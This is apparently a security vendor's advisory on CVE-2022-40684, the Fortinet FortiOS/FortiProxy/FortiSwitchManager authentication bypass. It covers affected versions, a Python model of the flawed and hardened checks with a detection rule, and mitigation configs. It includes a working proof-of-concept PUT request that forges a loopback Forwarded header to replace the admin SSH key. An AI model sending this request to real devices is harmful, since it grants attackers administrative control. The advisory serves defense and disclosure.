CVE-2022-40684: Fortinet Authentication Bypass Vulnerability Explained


The latest FortiOS / FortiProxy / FortiSwitchManager vulnerability, which allows an attacker to bypass authentication and log in as an administrator on the affected system, has reportedly been exploited in the wild.

Picus Labs has updated the Picus Threat Library with attacks that exploit the CVE-2022-40684 vulnerability affecting FortiOS, FortiProxy, and FortiSwitchManager products. We also updated the Picus Mitigation Library with prevention signatures of network security controls. 

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Which FortiOS, FortiProxy and FortiSwitchManager Products are Affected by the Vulnerability?

FortiGuard Labs has confirmed that the vulnerability affects the following Fortinet FortiOS, FortiProxy, and FortiSwitchManager products.

  • Affected FortiOS Products
    • 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5, 7.0.6, 7.2.0, 7.2.1

  • Affected FortiProxy Products
    • 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5, 7.0.6, 7.2.0

  • Affected FortiSwitchManager Products
    • 7.0.0, 7.2.0

What is the Impact of CVE-2022-40684 Vulnerability?

The CVE-2022-40684 vulnerability allows adversaries to bypass authentication and log in to vulnerable FortiOS / FortiProxy / FortiSwitchManager systems as an administrator.

Having admin user rights, adversaries can 

  • add new users to the vulnerable system, 
  • reroute the network traffic by updating network configurations, 
  • listen to and capture sensitive data by running packet capturing programs,
  • download system configurations [1].

The CVSSv3 score of the vulnerability is 9.6 Critical.

CVE-2022-40684 Vulnerability Exploitation Explained

Below, you can see an example Proof of Concept (PoC) that abuses the authentication bypass vulnerability to set an SSH key for the specified user [3].

The Proof of Concept (PoC)

1. Adversaries can exploit this vulnerability with any HTTP method, such as GET, POST, PUT, or DELETE. In the following example, the attacker sends an HTTP PUT request to the API.

2. Through the Forwarded header, the attacker can set the client_ip to "127.0.0.1". This bypasses authentication because the "trusted access" check only verifies that the client_ip is "127.0.0.1" and that the User-Agent is "Report Runner", both of which are directly controlled by the attacker.

3. Once the PUT request to the API is accepted, the attacker can modify the admin user's SSH keys to log in to the target system.

Example

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: 10.0.40.67
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
Content-Length: 612

{
  "ssh-public-key1": "\"ssh-rsa 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 dev@devs-MacBook-Pro.local\""
}
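To make the flaw concrete, the following added example (not code from the post, from Fortinet, or from the referenced PoC) models the "trusted access" decision described above in its flawed and hardened forms, and adds a detection rule over constructed request records; the peer addresses and paths are constructed for illustration.

```python
import re
from typing import Dict, List, Optional

# Matches the "for=" address in a Forwarded header, with or without
# quotes and IPv6-style brackets, e.g. for="[127.0.0.1]:8000"
FORWARDED_FOR = re.compile(r'for="?\[?([0-9a-fA-F.:]+)\]?')


def client_ip_from_forwarded(headers: Dict[str, str]) -> Optional[str]:
    """Return the client address claimed in the Forwarded header, if any."""
    m = FORWARDED_FOR.search(headers.get("Forwarded", ""))
    return m.group(1) if m else None


def trusted_access_vulnerable(peer_ip: str, headers: Dict[str, str]) -> bool:
    """Flawed check (modelled on the post's description, an assumption about
    the exact logic): client_ip is taken from the client-supplied Forwarded
    header, so a remote peer can claim to be loopback."""
    client_ip = client_ip_from_forwarded(headers) or peer_ip
    return client_ip == "127.0.0.1" and headers.get("User-Agent") == "Report Runner"


def trusted_access_hardened(peer_ip: str, headers: Dict[str, str]) -> bool:
    """Hardened check: only the transport-layer peer address decides whether
    the request is local; Forwarded and User-Agent carry no authority."""
    return peer_ip == "127.0.0.1"


def flag_request(peer_ip: str, method: str, path: str, headers: Dict[str, str]) -> bool:
    """Detection: a non-loopback peer claiming loopback via Forwarded, with the
    'Report Runner' agent, against the admin API is the pattern to alert on."""
    return (peer_ip != "127.0.0.1"
            and client_ip_from_forwarded(headers) == "127.0.0.1"
            and headers.get("User-Agent") == "Report Runner"
            and path.startswith("/api/v2/cmdb/"))


def scan(records: List[dict]) -> List[str]:
    """Return the paths of all flagged requests in a batch of records."""
    return [r["path"] for r in records if flag_request(**r)]


# Constructed sample records: an external peer forging loopback, and a
# genuine local request.
FORGED = {"peer_ip": "203.0.113.7", "method": "PUT",
          "path": "/api/v2/cmdb/system/admin/admin",
          "headers": {"User-Agent": "Report Runner",
                      "Forwarded": 'for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";'}}
LOCAL = {"peer_ip": "127.0.0.1", "method": "GET",
         "path": "/api/v2/cmdb/system/status",
         "headers": {"User-Agent": "Report Runner"}}
```

The vulnerable check accepts FORGED while the hardened one rejects it, and scan() flags only the forged record.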

How to Mitigate CVE-2022-40684 Vulnerability?

In its PSIRT advisory, FortiGuard Labs gives the following mitigation suggestions and recommends upgrading according to the vulnerable product [2].

For FortiOS:

  • Upgrade to version 7.2.2 or above
  • Upgrade to version 7.0.7 or above

If applying the patch is not possible, apply the following mitigation suggestions.

  • Suggestion 1: Disable HTTP/HTTPS administrative interface
  • Suggestion 2: Limit IP addresses that can reach the administrative interface

config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
end

  • Then create an Address Group:

config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end

  • Create the Local in Policy to restrict access only to the predefined group on management interface (here: port1):

config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end

  • If you are using non-default ports, create the appropriate service objects for GUI administrative access:

config firewall service custom
edit GUI_HTTPS
set tcp-portrange <admin-sport>
next
edit GUI_HTTP
set tcp-portrange <admin-port>
end

Use these objects instead of "HTTPS HTTP" in local-in policies 1 and 2 above.

For FortiProxy:

  • Upgrade to version 7.2.1 or above
  • Upgrade to version 7.0.7 or above

If applying the patch is not possible, apply the following mitigation suggestions.

  • Suggestion 1: Disable HTTP/HTTPS administrative interface
  • Suggestion 2: For FortiProxy VM (all versions) or FortiProxy appliance 7.0.6, limit the IP addresses that can reach the administrative interface (here: port1):

config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
end

For FortiSwitchManager:

  • Upgrade to version 7.2.1 or above
  • Workaround: Disable HTTP/HTTPS administrative interface

How Does Picus Simulate the FortiOS / FortiProxy / FortiSwitchManager CVE-2022-40684 Authentication Bypass on Administrative Interface Vulnerability Exploit?

We also strongly suggest simulating the FortiOS / FortiProxy / FortiSwitchManager CVE-2022-40684 authentication bypass on administrative interface vulnerability exploitation attack to assess the effectiveness of your security controls using the Picus Complete Security Control Validation Platform. You can test your defenses against CVE-2022-40684 exploitation attacks and assess your security posture against the exploitation of hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threat for CVE-2022-40684 vulnerability: 

Threat ID   Threat Name
85726       FortiOS Web Attack Campaign (Web Application)

References

[1] J. Horseman, “FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass IOCs (CVE-2022-40684),” Horizon3.ai, Oct. 11, 2022. [Online]. Available: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/. [Accessed: Oct. 18, 2022]

[2] “PSIRT Advisories,” FortiGuard. [Online]. Available: https://fortiguard.com/psirt/FG-IR-22-377. [Accessed: Oct. 18, 2022]

[3] “GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager,” GitHub. [Online]. Available: https://github.com/horizon3ai/CVE-2022-40684. [Accessed: Oct. 18, 2022]
